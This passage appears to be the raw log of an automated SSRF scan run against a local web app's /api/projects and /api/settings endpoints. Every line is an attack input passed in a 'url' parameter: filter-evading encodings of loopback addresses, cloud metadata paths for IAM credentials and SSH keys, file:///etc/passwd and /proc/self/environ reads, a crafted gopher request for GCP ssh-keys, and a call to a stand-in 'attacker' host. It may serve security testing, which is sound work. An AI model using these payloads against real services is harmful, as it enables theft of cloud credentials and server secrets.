`http://localhost:4200/api/projects?url=%5B%3A%3A%5D%3A3128` +- Testing: `http://localhost:4200/api/projects?url=%5B%3A%3A%5D%3A80` +- Testing: `http://localhost:4200/api/projects?url=%5B%3A%3A%5D%3A3389` +- Testing: `http://localhost:4200/api/projects?url=%5B%3A%3A%5D%3A8000` +- Testing: `http://localhost:4200/api/projects?url=%5B%3A%3A%5D%3A8001` +- Testing: `http://localhost:4200/api/projects?url=%5B%3A%3A%5D%3A8444` +- Testing: `http://localhost:4200/api/projects?url=%5B%3A%3A%5D%3A9901` +- Testing: `http://localhost:4200/api/projects?url=app-169-254-169-254.nip.io` +- Testing: `http://localhost:4200/api/projects?url=customer2-app-169-254-169-254.nip.io` +- Testing: `http://localhost:4200/api/projects?url=instance-data` +- Testing: `http://localhost:4200/api/projects?url=localhost%3A22` +- Testing: `http://localhost:4200/api/projects?url=localhost%3A443` +- Testing: `http://localhost:4200/api/projects?url=localhost%3A80` +- Testing: `http://localhost:4200/api/projects?url=localhost%3A3389` +- Testing: `http://localhost:4200/api/projects?url=localhost%3A8000` +- Testing: `http://localhost:4200/api/projects?url=localhost%3A8001` +- Testing: `http://localhost:4200/api/projects?url=localhost%3A8444` +- Testing: `http://localhost:4200/api/projects?url=localhost%3A9901` +- Testing: `http://localhost:4200/api/projects?url=localhost.localdomain` +- Testing: `http://localhost:4200/api/projects?url=loopback` +- Testing: `http://localhost:4200/api/projects?url=loopback%3A22` +- Testing: `http://localhost:4200/api/projects?url=loopback%3A80` +- Testing: `http://localhost:4200/api/projects?url=loopback%3A443` +- Testing: `http://localhost:4200/api/projects?url=loopback%3A3389` +- Testing: `http://localhost:4200/api/projects?url=loopback%3A8000` +- Testing: `http://localhost:4200/api/projects?url=loopback%3A9901` +- Testing: `http://localhost:4200/api/projects?url=loopback%3A8001` +- Testing: `http://localhost:4200/api/projects?url=loopback%3A8444` +- Testing: `http://localhost:4200/api/projects?url=ipcop.localdomain%3A8443` +- Testing: `http://localhost:4200/api/projects?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2F` +- Testing: `http://localhost:4200/api/projects?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2Finstance%2Fhostname` +- Testing: `http://localhost:4200/api/projects?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2Finstance%2Fid` +- Testing: `http://localhost:4200/api/projects?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2Fproject%2Fproject-id` +- Testing: `http://localhost:4200/api/projects?url=metadata.nicob.net` +- Testing: `http://localhost:4200/api/projects?url=owasp.org.169.254.169.254.nip.io` +- Testing: `http://localhost:4200/api/projects?url=ssrf-169.254.169.254.localdomain.pw` +- Testing: `http://localhost:4200/api/projects?url=ssrf-cloud.localdomain.pw` +- Testing: `http://localhost:4200/api/projects?url=www.owasp.org.1ynrnhl.xip.io` +- Testing: `http://localhost:4200/api/projects?url=127.1%3A80` +- Testing: `http://localhost:4200/api/projects?url=%5B%3A%3A%5D%3A80%2F` +- Testing: `http://localhost:4200/api/projects?url=%5B%3A%3A%5D%3A25%2F%20SMTP` +- Testing: `http://localhost:4200/api/projects?url=%5B%3A%3A%5D%3A3128%2F%20Squid` +- Testing: `http://localhost:4200/api/projects?url=%5B0000%3A%3A1%5D%3A80%2F` +- Testing: `http://localhost:4200/api/projects?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%2Fthefile` +- Testing: `http://localhost:4200/api/projects?url=%E2%91%A0%E2%91%A1%E2%91%A6.%E2%93%AA.%E2%93%AA.%E2%93%AA` +- Testing: `http://localhost:4200/api/projects?url=2130706433%2F` +- Testing: `http://localhost:4200/api/projects?url=3232235521%2F` +- Testing: `http://localhost:4200/api/projects?url=3232235777%2F` +- Testing: `http://localhost:4200/api/projects?url=0x7f000001%2F` +- Testing: `http://localhost:4200/api/projects?url=0xc0a80014%2F` +- Testing: `http://localhost:4200/api/projects?url=%7Bdomain%7D%40127.0.0.1` +- Testing: `http://localhost:4200/api/projects?url=127.0.0.1%23%7Bdomain%7D` +- Testing: `http://localhost:4200/api/projects?url=%7Bdomain%7D.127.0.0.1` +- Testing: `http://localhost:4200/api/projects?url=127.0.0.1%2F%7Bdomain%7D` +- Testing: `http://localhost:4200/api/projects?url=127.0.0.1%2F%3Fd%3D%7Bdomain%7D` +- Testing: `http://localhost:4200/api/projects?url=%7Bdomain%7D%40localhost` +- Testing: `http://localhost:4200/api/projects?url=localhost%23%7Bdomain%7D` +- Testing: `http://localhost:4200/api/projects?url=%7Bdomain%7D.localhost` +- Testing: `http://localhost:4200/api/projects?url=localhost%2F%7Bdomain%7D` +- Testing: `http://localhost:4200/api/projects?url=localhost%2F%3Fd%3D%7Bdomain%7D` +- Testing: `http://localhost:4200/api/projects?url=127.0.0.1%2500%7Bdomain%7D` +- Testing: `http://localhost:4200/api/projects?url=127.0.0.1%3F%7Bdomain%7D` +- Testing: `http://localhost:4200/api/projects?url=127.0.0.1%2F%2F%2F%7Bdomain%7D` +- Testing: `http://localhost:4200/api/projects?url=127.0.0.1%2F%2F%2F%7Bdomain%7Dst%3A%2B11211aaa` +- Testing: `http://localhost:4200/api/projects?url=st%3A00011211aaaa` +- Testing: `http://localhost:4200/api/projects?url=0%2F` +- Testing: `http://localhost:4200/api/projects?url=1.1.1.1%20%26%402.2.2.2%23%20%403.3.3.3%2F` +- Testing: `http://localhost:4200/api/projects?url=127.1.1.1%3A80%5C%5C%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/projects?url=127.1.1.1%3A80%5C%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/projects?url=127.1.1.1%3A80%3A%5C%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/projects?url=127.1.1.1%3A80%23%5C%5C%40127.2.2.2%3A80%2F` +## Testing endpoint: http://localhost:4200/api/settings +- Testing: `http://localhost:4200/api/settings?url=169.254.169.254%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/api/settings?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2F` +- Testing: `http://localhost:4200/api/settings?url=localhost%3A8080%2Fadmin` +- Testing: `http://localhost:4200/api/settings?url=file%3A%2F%2F%2Fetc%2Fpasswd` +- Testing: `http://localhost:4200/api/settings?url=file%3A%2F%2F%2Fproc%2Fself%2Fenviron` +- Testing: `http://localhost:4200/api/settings?url=localhost%3A3000%2Fadmin` +- Testing: `http://localhost:4200/api/settings?url=127.0.0.1%3A3000%2Fconfig` +- Testing: `http://localhost:4200/api/settings?url=localhost%3A3000%2Fapi%2Finternal` +- Testing: `http://localhost:4200/api/settings?url=localhost%3A3000%2Frails%2Finfo` +- Testing: `http://localhost:4200/api/settings?url=localhost%3A3000%2Flogs` +- Testing: `http://localhost:4200/api/settings?url=mysql%3A%2F%2F127.0.0.1%3A3306%2F` +- Testing: `http://localhost:4200/api/settings?url=mysql%3A%2F%2Flocalhost%3A3306%2F` +- Testing: `http://localhost:4200/api/settings?url=redis%3A%2F%2F127.0.0.1%3A6379%2F` +- Testing: `http://localhost:4200/api/settings?url=redis%3A%2F%2Flocalhost%3A6379%2F` +- Testing: `http://localhost:4200/api/settings?url=127.0.0.1%3A9876%2F` +- Testing: `http://localhost:4200/api/settings?url=127.0.0.1%3A54247%2F` +- Testing: `http://localhost:4200/api/settings?url=127.0.0.1%3A59465%2F` +- Testing: `http://localhost:4200/api/settings?url=file%3A%2F%2F%2Fvar%2Flog%2Fnginx%2Faccess.log` +- Testing: `http://localhost:4200/api/settings?url=localhost%3A4200%2F.git%2Fconfig` +- Testing: `http://localhost:4200/api/settings?url=169.254.169.254%2Fmetadata%2Finstance` +- Testing: `http://localhost:4200/api/settings?url=localhost%3A4200%2Fapi%2Fdocs%2F` +- Testing: `http://localhost:4200/api/settings?url=localhost%3A4200%2Fapi%2Finternal` +- Testing: `http://localhost:4200/api/settings?url=localhost%3A4200%2Fapi%2Flogs` +- Testing: `http://localhost:4200/api/settings?url=localhost%3A4200%2Fapi%2Fconfig` +- Testing: `http://localhost:4200/api/settings?url=localhost%3A4200%2Fapi%2Fauth_test` +- Testing: `http://localhost:4200/api/settings?url=localhost%3A4200%2Fapi%2Foverseer_images` +- Testing: `http://localhost:4200/api/settings?url=localhost%3A4200%2Fapi%2Fcampuses` +- Testing: `http://localhost:4200/api/settings?url=localhost%3A4200%2Fapi%2Fcsv` +- Testing: `http://localhost:4200/api/settings?url=localhost%3A4200%2Fapi%2Fprojects` +- Testing: `http://localhost:4200/api/settings?url=localhost%3A4200%2Fapi%2Fsettings` +- Testing: `http://localhost:4200/api/settings?url=localhost%3A4200%2Fapi%2Fstudents` +- Testing: `http://localhost:4200/api/settings?url=localhost%3A4200%2Fapi%2Fsubmission` +- Testing: `http://localhost:4200/api/settings?url=localhost%3A4200%2Fapi%2Ftasks` +- Testing: `http://localhost:4200/api/settings?url=localhost%3A4200%2Fapi%2Fteaching_periods` +- Testing: `http://localhost:4200/api/settings?url=localhost%3A4200%2Fapi%2Ftii_actions` +- Testing: `http://localhost:4200/api/settings?url=localhost%3A4200%2Fapi%2Ftii_eula` +- Testing: `http://localhost:4200/api/settings?url=localhost%3A4200%2Fapi%2Ftii_hook` +- Testing: `http://localhost:4200/api/settings?url=localhost%3A4200%2Fapi%2Ftutorials` +- Testing: `http://localhost:4200/api/settings?url=localhost%3A4200%2Fapi%2Funit_roles` +- Testing: `http://localhost:4200/api/settings?url=localhost%3A4200%2Fapi%2Funits` +- Testing: `http://localhost:4200/api/settings?url=localhost%3A4200%2Fapi%2Fusers` +- Testing: `http://localhost:4200/api/settings?url=localhost%3A4200%2F.env` +- Testing: `http://localhost:4200/api/settings?url=localhost%3A4200%2F.git` +- Testing: `http://localhost:4200/api/settings?url=127.0.0.1%3A80` +- Testing: `http://localhost:4200/api/settings?url=127.0.0.1%3A443` +- Testing: `http://localhost:4200/api/settings?url=127.0.0.1%3A22` +- Testing: `http://localhost:4200/api/settings?url=127.1%3A80` +- Testing: `http://localhost:4200/api/settings?url=0` +- Testing: `http://localhost:4200/api/settings?url=0.0.0.0%3A80` +- Testing: `http://localhost:4200/api/settings?url=localhost%3A80` +- Testing: `http://localhost:4200/api/settings?url=%5B%3A%3A%5D%3A80%2F` +- Testing: `http://localhost:4200/api/settings?url=%5B%3A%3A%5D%3A25%2F%20SMTP` +- Testing: `http://localhost:4200/api/settings?url=%5B%3A%3A%5D%3A3128%2F%20Squid` +- Testing: `http://localhost:4200/api/settings?url=%5B0000%3A%3A1%5D%3A80%2F` +- Testing: `http://localhost:4200/api/settings?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%2Fthefile` +- Testing: `http://localhost:4200/api/settings?url=%E2%91%A0%E2%91%A1%E2%91%A6.%E2%93%AA.%E2%93%AA.%E2%93%AA` +- Testing: `http://localhost:4200/api/settings?url=127.127.127.127` +- Testing: `http://localhost:4200/api/settings?url=127.0.1.3` +- Testing: `http://localhost:4200/api/settings?url=127.0.0.0` +- Testing: `http://localhost:4200/api/settings?url=2130706433` +- Testing: `http://localhost:4200/api/settings?url=017700000001` +- Testing: `http://localhost:4200/api/settings?url=0x7f000001` +- Testing: `http://localhost:4200/api/settings?url=google.com%40127.0.0.1` +- Testing: `http://localhost:4200/api/settings?url=127.0.0.1%23google.com` +- Testing: `http://localhost:4200/api/settings?url=google.com.127.0.0.1` +- Testing: `http://localhost:4200/api/settings?url=127.0.0.1%2Fgoogle.com` +- Testing: `http://localhost:4200/api/settings?url=127.0.0.1%2F%3Fd%3Dgoogle.com` +- Testing: `http://localhost:4200/api/settings?url=` +- Testing: `http://localhost:4200/api/settings?url=google.com%40127.0.0.1` +- Testing: `http://localhost:4200/api/settings?url=` +- Testing: `http://localhost:4200/api/settings?url=127.0.0.1%23google.com` +- Testing: `http://localhost:4200/api/settings?url=` +- Testing: `http://localhost:4200/api/settings?url=google.com.127.0.0.1` +- Testing: `http://localhost:4200/api/settings?url=` +- Testing: `http://localhost:4200/api/settings?url=127.0.0.1%2Fgoogle.com` +- Testing: `http://localhost:4200/api/settings?url=` +- Testing: `http://localhost:4200/api/settings?url=127.0.0.1%2F%3Fd%3Dgoogle.com` +- Testing: `http://localhost:4200/api/settings?url=google.com%40localhost` +- Testing: `http://localhost:4200/api/settings?url=localhost%23google.com` +- Testing: `http://localhost:4200/api/settings?url=google.com.localhost` +- Testing: `http://localhost:4200/api/settings?url=localhost%2Fgoogle.com` +- Testing: `http://localhost:4200/api/settings?url=localhost%2F%3Fd%3Dgoogle.com` +- Testing: `http://localhost:4200/api/settings?url=127.0.0.1%2500google.com` +- Testing: `http://localhost:4200/api/settings?url=127.0.0.1%3Fgoogle.com` +- Testing: `http://localhost:4200/api/settings?url=127.0.0.1%2F%2F%2Fgoogle.com` +- Testing: `http://localhost:4200/api/settings?url=` +- Testing: `http://localhost:4200/api/settings?url=127.0.0.1%2500google.com` +- Testing: `http://localhost:4200/api/settings?url=` +- Testing: `http://localhost:4200/api/settings?url=127.0.0.1%3Fgoogle.com` +- Testing: `http://localhost:4200/api/settings?url=` +- Testing: `http://localhost:4200/api/settings?url=127.0.0.1%2F%2F%2Fgoogle.com` +- Testing: `http://localhost:4200/api/settings?url=localtest.me` +- Testing: `http://localhost:4200/api/settings?url=http%3A%400%2F` +- Testing: `http://localhost:4200/api/settings?url=%5B%3A%3A%5D%3A80` +- Testing: `http://localhost:4200/api/settings?url=127%E3%80%820%E3%80%820%E3%80%821` +- Testing: `http://localhost:4200/api/settings?url=127%25E3%2580%25820%25E3%2580%25820%25E3%2580%25821` +- Testing: `http://localhost:4200/api/settings?url=2130706433%2F` +- Testing: `http://localhost:4200/api/settings?url=3232235521%2F` +- Testing: `http://localhost:4200/api/settings?url=3232235777%2F` +- Testing: `http://localhost:4200/api/settings?url=0177.0000.0000.0001` +- Testing: `http://localhost:4200/api/settings?url=00000177.00000000.00000000.00000001` +- Testing: `http://localhost:4200/api/settings?url=127.0.0.1` +- Testing: `http://localhost:4200/api/settings?url=0x7f000001%2F` +- Testing: `http://localhost:4200/api/settings?url=0xc0a80014%2F` +- Testing: `http://localhost:4200/api/settings?url=0x7f.0x00.0x00.0x01` +- Testing: `http://localhost:4200/api/settings?url=0x0000007f.0x00000000.0x00000000.0x00000001` +- Testing: `http://localhost:4200/api/settings?url=127.000000000000.1` +- Testing: `http://localhost:4200/api/settings?url=localhost%3A%2B11211aaa` +- Testing: `http://localhost:4200/api/settings?url=localhost%3A00011211aaaa` +- Testing: `http://localhost:4200/api/settings?url=0%2F` +- Testing: `http://localhost:4200/api/settings?url=127.1` +- Testing: `http://localhost:4200/api/settings?url=127.0.1` +- Testing: `http://localhost:4200/api/settings?url=localtest.me` +- Testing: `http://localhost:4200/api/settings?url=customer1.app.localhost.my.company.127.0.0.1.nip.io` +- Testing: `http://localhost:4200/api/settings?url=mail.ebc.apple.com` +- Testing: `http://localhost:4200/api/settings?url=127.0.0.1.nip.io` +- Testing: `http://localhost:4200/api/settings?url=www.example.com.customlookup.www.google.com.endcustom.sentinel.pentesting.us` +- Testing: `http://localhost:4200/api/settings?url=customer1.app.localhost.my.company.127.0.0.1.nip.io` +- Testing: `http://localhost:4200/api/settings?url=bugbounty.dod.network` +- Testing: `http://localhost:4200/api/settings?url=1ynrnhl.xip.io` +- Testing: `http://localhost:4200/api/settings?url=spoofed.burpcollaborator.net` +- Testing: `http://localhost:4200/api/settings?url=customer1.app.localhost.my.company.127.0.0.1.nip.io` +- Testing: `http://localhost:4200/api/settings?url=spoofed.burpcollaborator.net` +- Testing: `http://localhost:4200/api/settings?url=127.1.1.1%3A80%5C%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/settings?url=127.1.1.1%3A80%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/settings?url=127.1.1.1%3A80%3A%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/settings?url=127.1.1.1%3A80%23%5C%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/settings?url=127.0.1.3` +- Testing: `http://localhost:4200/api/settings?url=0` +- Testing: `http://localhost:4200/api/settings?url=127.1` +- Testing: `http://localhost:4200/api/settings?url=127.0.1` +- Testing: `http://localhost:4200/api/settings?url=localhost` +- Testing: `http://localhost:4200/api/settings?url=1.0.0.127.in-addr.arpa` +- Testing: `http://localhost:4200/api/settings?url=01111111000000000000000000000001` +- Testing: `http://localhost:4200/api/settings?url=0x7f.0x0.0x0.0x1` +- Testing: `http://localhost:4200/api/settings?url=0177.0.0.01` +- Testing: `http://localhost:4200/api/settings?url=7F000001` +- Testing: `http://localhost:4200/api/settings?url=2130706433` +- Testing: `http://localhost:4200/api/settings?url=6425673729` +- Testing: `http://localhost:4200/api/settings?url=127001` +- Testing: `http://localhost:4200/api/settings?url=127_0._0_1` +- Testing: `http://localhost:4200/api/settings?url=0000%3A%3A1` +- Testing: `http://localhost:4200/api/settings?url=0000%3A%3A1%3A80` +- Testing: `http://localhost:4200/api/settings?url=%3A%3Affff%3A7f00%3A0001` +- Testing: `http://localhost:4200/api/settings?url=0000%3A0000%3A0000%3A0000%3A0000%3Affff%3A7f00%3A0001` +- Testing: `http://localhost:4200/api/settings?url=localtest.me` +- Testing: `http://localhost:4200/api/settings?url=bugbounty.dod.network` +- Testing: `http://localhost:4200/api/settings?url=127.127.127.127` +- Testing: `http://localhost:4200/api/settings?url=0177.0.0.1` +- Testing: `http://localhost:4200/api/settings?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%95%E2%93%94%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%95%E2%93%94%3A80` +- Testing: `http://localhost:4200/api/settings?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%E2%93%95%E2%93%94%E2%93%90%E2%91%A8%E2%93%95%E2%93%94%3A80` +- Testing: `http://localhost:4200/api/settings?url=%E2%91%A1%E2%91%A7%E2%91%A4%E2%91%A1%E2%93%AA%E2%91%A2%E2%91%A8%E2%91%A0%E2%91%A5%E2%91%A5%3A80` +- Testing: `http://localhost:4200/api/settings?url=%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%E3%80%82%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%E3%80%82%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%E3%80%82%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%3A80` +- Testing: `http://localhost:4200/api/settings?url=whitelisted%40127.0.0.1` +- Testing: `http://localhost:4200/api/settings?url=0x7f000001` +- Testing: `http://localhost:4200/api/settings?url=017700000001` +- Testing: `http://localhost:4200/api/settings?url=0177.00.00.01` +- Testing: `http://localhost:4200/api/settings?url=0000.0000.0000.0000` +- Testing: `http://localhost:4200/api/settings?url=0177.0000.0000.0001` +- Testing: `http://localhost:4200/api/settings?url=0177.0001.0000..0001` +- Testing: `http://localhost:4200/api/settings?url=0x7f.0x1.0x0.0x1` +- Testing: `http://localhost:4200/api/settings?url=0x7f.0x1.0x1` +- Testing: `http://localhost:4200/api/settings?url=ht%EF%BF%BD%EF%B8%8Ftp%3A%2F%2F12%EF%BF%BD7.0.0.1` +- Testing: `http://localhost:4200/api/settings?url=loopback%3A%2B11211aaa` +- Testing: `http://localhost:4200/api/settings?url=loopback%3A00011211aaaa` +- Testing: `http://localhost:4200/api/settings?url=%E2%91%AF%E2%91%A8%E3%80%82%E2%91%A1%E2%91%A4%E2%91%A3%E3%80%82%E2%91%AF%E2%91%A8%EF%BD%A1%E2%91%A1%E2%91%A4%E2%91%A3` +- Testing: `http://localhost:4200/api/settings?url=169.254.169.254` +- Testing: `http://localhost:4200/api/settings?url=2852039166` +- Testing: `http://localhost:4200/api/settings?url=7147006462` +- Testing: `http://localhost:4200/api/settings?url=0xa9.0xfe.0xa9.0xfe` +- Testing: `http://localhost:4200/api/settings?url=0251.0376.0251.0376` +- Testing: `http://localhost:4200/api/settings?url=169%E3%80%82254%E3%80%82169%E3%80%82254` +- Testing: `http://localhost:4200/api/settings?url=169%EF%BD%A1254%EF%BD%A1169%EF%BD%A1254` +- Testing: `http://localhost:4200/api/settings?url=%E2%91%A3%E2%91%A1%E2%91%A4%EF%BD%A1%E2%91%A4%E2%91%A0%E2%93%AA%EF%BD%A1%E2%91%A3%E2%91%A1%E2%91%A4%EF%BD%A1%E2%91%A4%E2%91%A0%E2%93%AA%3A80` +- Testing: `http://localhost:4200/api/settings?url=%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%EF%BD%A1%E2%93%AA%E2%93%AA%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%EF%BD%A1%E2%93%AA%E2%93%AA%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%EF%BD%A1%E2%93%AA%E2%93%AA%E2%93%AA%E2%93%AA%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%3A80` +- Testing: `http://localhost:4200/api/settings?url=%5B%3A%3A%E2%91%A0%E2%91%A5%E2%91%A8%EF%BD%A1%E2%91%A1%E2%91%A4%E2%91%A3%EF%BD%A1%E2%91%AF%E2%91%A8%EF%BD%A1%E2%91%A1%E2%91%A4%E2%91%A3%5D%3A80` +- Testing: `http://localhost:4200/api/settings?url=%5B%3A%3A%E2%93%95%E2%93%95%E2%93%95%E2%93%95%3A%E2%91%A0%E2%91%A5%E2%91%A8%E3%80%82%E2%91%A1%E2%91%A4%E2%91%A3%E3%80%82%E2%91%AF%E2%91%A8%E3%80%82%E2%91%A1%E2%91%A4%E2%91%A3%5D%3A80` +- Testing: `http://localhost:4200/api/settings?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%E3%80%82%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%E3%80%82%E2%91%A3%E2%91%A2%E2%91%A4%E2%91%A0%E2%91%A7%3A80` +- Testing: `http://localhost:4200/api/settings?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%EF%BD%A1%E2%91%AF%E2%91%A5%E2%91%A7%E2%91%A8%E2%91%A5%E2%91%A5%E2%91%A1%3A80` +- Testing: `http://localhost:4200/api/settings?url=%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%E3%80%82%E2%91%AF%E2%91%A5%E2%91%A7%E2%91%A8%E2%91%A5%E2%91%A5%E2%91%A1%3A80` +- Testing: `http://localhost:4200/api/settings?url=%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%95%E2%93%94%EF%BD%A1%E2%91%A3%E2%91%A2%E2%91%A4%E2%91%A0%E2%91%A7%3A80` +- Testing: `http://localhost:4200/api/settings?url=dict%3A%2F%2Fattacker%3A11111` +- Testing: `http://localhost:4200/api/settings?url=file%3A%2F%2F%2Fetc%2Fpasswd` +- Testing: `http://localhost:4200/api/settings?url=file%3A%2F%2F%5C%2F%5C%2Fetc%2Fpasswd` +- Testing: `http://localhost:4200/api/settings?url=file%3A%2F%2Fpath%2Fto%2Ffile` +- Testing: `http://localhost:4200/api/settings?url=gopher%3A%2F%2Fmetadata.google.internal%3A80%2FxGET%2520%2FcomputeMetadata%2Fv1%2Finstance%2Fattributes%2Fssh-keys%2520HTTP%252f%2531%252e%2531%250AHost%3A%2520metadata.google.internal%250AAccept%3A%2520%252a%252f%252a%250aMetadata-Flavor%3A%2520Google%250d%250a` +- Testing: `http://localhost:4200/api/settings?url=gopher%3A%2F%2Fnozaki.io%2F_SSRF%250ATest!` +- Testing: `http://localhost:4200/api/settings?url=0.0.0.0%3A22` +- Testing: `http://localhost:4200/api/settings?url=0.0.0.0%3A443` +- Testing: `http://localhost:4200/api/settings?url=0.0.0.0%3A80` +- Testing: `http://localhost:4200/api/settings?url=0.0.0.0%3A3389` +- Testing: `http://localhost:4200/api/settings?url=0000%3A%3A1%3A22` +- Testing: `http://localhost:4200/api/settings?url=0000%3A%3A1%3A25` +- Testing: `http://localhost:4200/api/settings?url=0000%3A%3A1%3A3128` +- Testing: `http://localhost:4200/api/settings?url=0000%3A%3A1%3A3389` +- Testing: `http://localhost:4200/api/settings?url=0251.00376.000251.0000376` +- Testing: `http://localhost:4200/api/settings?url=0x41414141A9FEA9FE` +- Testing: `http://localhost:4200/api/settings?url=0xA9.0xFE.0xA9.0xFE` +- Testing: `http://localhost:4200/api/settings?url=0xA9FEA9FE` +- Testing: `http://localhost:4200/api/settings?url=0xa9fea9fe` +- Testing: `http://localhost:4200/api/settings?url=100.100.100.200%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/api/settings?url=100.100.100.200%2Flatest%2Fmeta-data%2Fimage-id` +- Testing: `http://localhost:4200/api/settings?url=100.100.100.200%2Flatest%2Fmeta-data%2Finstance-id` +- Testing: `http://localhost:4200/api/settings?url=127.0.0.0` +- Testing: `http://localhost:4200/api/settings?url=127.0.0.1%3A22` +- Testing: `http://localhost:4200/api/settings?url=127.0.0.1%3A2379%2Fversion` +- Testing: `http://localhost:4200/api/settings?url=127.0.0.1%3A443` +- Testing: `http://localhost:4200/api/settings?url=127.0.0.1%3A80` +- Testing: `http://localhost:4200/api/settings?url=127.0.0.1%3A3389` +- Testing: `http://localhost:4200/api/settings?url=127.0.0.1%3A8000` +- Testing: `http://localhost:4200/api/settings?url=127.0.0.1%3A9901` +- Testing: `http://localhost:4200/api/settings?url=127.0.0.1%3A8001` +- Testing: `http://localhost:4200/api/settings?url=127.0.0.1%3A8444` +- Testing: `http://localhost:4200/api/settings?url=127.1.1.1` +- Testing: `http://localhost:4200/api/settings?url=127.1.1.1%3A80%23%5C%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/api/settings?url=127.1.1.1%3A80%3A%5C%40%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/api/settings?url=127.1.1.1%3A80%5C%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/api/settings?url=127.1.1.1%3A80%5C%40%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/api/settings?url=127.127.127.127.nip.io` +- Testing: `http://localhost:4200/api/settings?url=169.254.169.254.xip.io` +- Testing: `http://localhost:4200/api/settings?url=169.254.169.254%2FcomputeMetadata%2Fv1%2F` +- Testing: `http://localhost:4200/api/settings?url=169.254.169.254%2Flatest%2Fdynamic%2Finstance-identity%2Fdocument` +- Testing: `http://localhost:4200/api/settings?url=169.254.169.254%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/api/settings?url=169.254.169.254%2Flatest%2Fmeta-data%2Fami-id` +- Testing: `http://localhost:4200/api/settings?url=169.254.169.254%2Flatest%2Fmeta-data%2Fhostname` +- Testing: `http://localhost:4200/api/settings?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2F` +- Testing: `http://localhost:4200/api/settings?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2FPhotonInstance` +- Testing: `http://localhost:4200/api/settings?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2Fdummy` +- Testing: `http://localhost:4200/api/settings?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2Fs3access` +- Testing: `http://localhost:4200/api/settings?url=169.254.169.254%2Flatest%2Fmeta-data%2Fpublic-keys%2F` +- Testing: `http://localhost:4200/api/settings?url=169.254.169.254%2Flatest%2Fmeta-data%2Fpublic-keys%2F0%2Fopenssh-key` +- Testing: `http://localhost:4200/api/settings?url=169.254.169.254%2Flatest%2Fmeta-data%2Fpublic-keys%2F%5BID%5D%2Fopenssh-key` +- Testing: `http://localhost:4200/api/settings?url=169.254.169.254%2Flatest%2Fmeta-data%2Freservation-id` +- Testing: `http://localhost:4200/api/settings?url=169.254.169.254%2Flatest%2Fuser-data` +- Testing: `http://localhost:4200/api/settings?url=169.254.169.254%2Flatest%2Fuser-data%2Fiam%2Fsecurity-credentials%2F` +- Testing: `http://localhost:4200/api/settings?url=192.0.0.192%2Flatest%2F` +- Testing: `http://localhost:4200/api/settings?url=192.0.0.192%2Flatest%2Fattributes%2F` +- Testing: `http://localhost:4200/api/settings?url=192.0.0.192%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/api/settings?url=192.0.0.192%2Flatest%2Fuser-data%2F` +- Testing: `http://localhost:4200/api/settings?url=3232235521` +- Testing: `http://localhost:4200/api/settings?url=3232235777` +- Testing: `http://localhost:4200/api/settings?url=425.510.425.510` +- Testing: `http://localhost:4200/api/settings?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D` +- Testing: `http://localhost:4200/api/settings?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A8000` +- Testing: `http://localhost:4200/api/settings?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A8001` +- Testing: `http://localhost:4200/api/settings?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A8444` +- Testing: `http://localhost:4200/api/settings?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A9901` +- Testing: `http://localhost:4200/api/settings?url=%5B%3A%3A%5D` +- Testing: `http://localhost:4200/api/settings?url=%5B%3A%3A%5D%3A22` +- Testing: `http://localhost:4200/api/settings?url=%5B%3A%3A%5D%3A25` +- Testing: `http://localhost:4200/api/settings?url=%5B%3A%3A%5D%3A3128` +- Testing: `http://localhost:4200/api/settings?url=%5B%3A%3A%5D%3A80` +- Testing: 